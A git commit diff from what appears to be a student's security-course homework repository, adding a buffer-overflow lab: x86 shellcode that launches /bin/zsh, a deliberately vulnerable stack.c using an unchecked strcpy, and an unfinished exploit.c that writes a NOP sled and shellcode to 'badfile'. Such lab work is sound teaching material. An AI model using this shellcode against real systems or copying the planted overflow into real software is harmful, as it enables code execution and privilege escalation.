organizing. Initial hw2 commit.

2018-02-12 04:57:21 -06:00 · 2018-02-12 04:57:21 -06:00 · 2f9a0e6b31
commit 2f9a0e6b31
parent 2dc7015d7a
11 changed files with 102 additions and 0 deletions
--- a/hw1/ethernet_header.h
+++ b/hw1/ethernet_header.h
--- a/hw1/set_device.cpp
+++ b/hw1/set_device.cpp
--- a/hw1/sniffex.c
+++ b/hw1/sniffex.c
--- a/hw1/spoof.c
+++ b/hw1/spoof.c
--- a/hw1/test_filtering.cpp
+++ b/hw1/test_filtering.cpp
--- a/hw1/tfsession.pcap
+++ b/hw1/tfsession.pcap
--- a/hw2/badfile
+++ b/hw2/badfile
--- a/hw2/call_shellcode.c
+++ b/hw2/call_shellcode.c
@ -0,0 +1,27 @@
+/* call_shellcode.c */
+/*A program that creates a file containing code for launching shell*/
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+const char code[] =
+	"\x31\xc0" /* Line 1: xorl %eax,%eax */
+	"\x50" /* Line 2: pushl %eax */
+	"\x68""/zsh" /* Line 3: pushl $0x68732f2f */
+	"\x68""/bin" /* Line 4: pushl $0x6e69622f */
+	"\x89\xe3" /* Line 5: movl %esp,%ebx */
+	"\x50" /* Line 6: pushl %eax */
+	"\x53" /* Line 7: pushl %ebx */
+	"\x89\xe1" /* Line 8: movl %esp,%ecx */
+	"\x99" /* Line 9: cdql */
+	"\xb0\x0b" /* Line 10: movb $0x0b,%al */
+	"\xcd\x80" /* Line 11: int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+	char buf[sizeof(code)];
+	strcpy(buf, code);
+	((void(*)( ))buf)( );
+}
--- a/hw2/exploit.c
+++ b/hw2/exploit.c
@ -0,0 +1,39 @@
+/* exploit.c */
+
+/* A program that creates a file containing code for launching shell*/
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+char shellcode[]=
+    "\x31\xc0" /* xorl %eax,%eax */
+    "\x50" /* pushl %eax */
+    "\x68""/zsh" /* pushl $0x68732f2f */
+    "\x68""/bin" /* pushl $0x6e69622f */
+    "\x89\xe3" /* movl %esp,%ebx */
+    "\x50" /* pushl %eax */
+    "\x53" /* pushl %ebx */
+    "\x89\xe1" /* movl %esp,%ecx */
+    "\x99" /* cdql */
+    "\xb0\x0b" /* movb $0x0b,%al */
+    "\xcd\x80" /* int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+    char buffer[517];
+    FILE *badfile;
+    
+    /* Initialize buffer with 0x90 (NOP instruction) */
+    memset(&buffer, 0x90, 517);
+    
+    /* You need to fill the buffer with appropriate contents here */
+    strcpy(buffer, shellcode);
+
+    /* Save the contents to the file "badfile" */
+    badfile = fopen("./badfile", "w");
+    
+    fwrite(buffer, 517, 1, badfile);
+    fclose(badfile);
+}
--- a/hw2/shellcode.c
+++ b/hw2/shellcode.c
@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <string.h>
+
+int main( ) {
+	char *name[2];
+	name[0] = "/bin/zsh";
+	name[1] = NULL;
+	execve(name[0], name, NULL);
+}
--- a/hw2/stack.c
+++ b/hw2/stack.c
@ -0,0 +1,27 @@
+/* stack.c */
+
+/* This program has a buffer overflow vulnerability. */
+/* Our task is to exploit this vulnerability */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+int bof(char *str)
+{
+    char buffer[12];
+    /* The following statement has a buffer overflow problem */
+    strcpy(buffer, str);
+    return 1;
+}
+
+void main(int argc, char **argv)
+{
+    char str[517];
+    FILE *badfile;
+    badfile = fopen("badfile", "r");
+    fread(str, sizeof(char), 517, badfile);
+    bof(str);
+    printf("Returned Properly\n");
+    return 1;
+}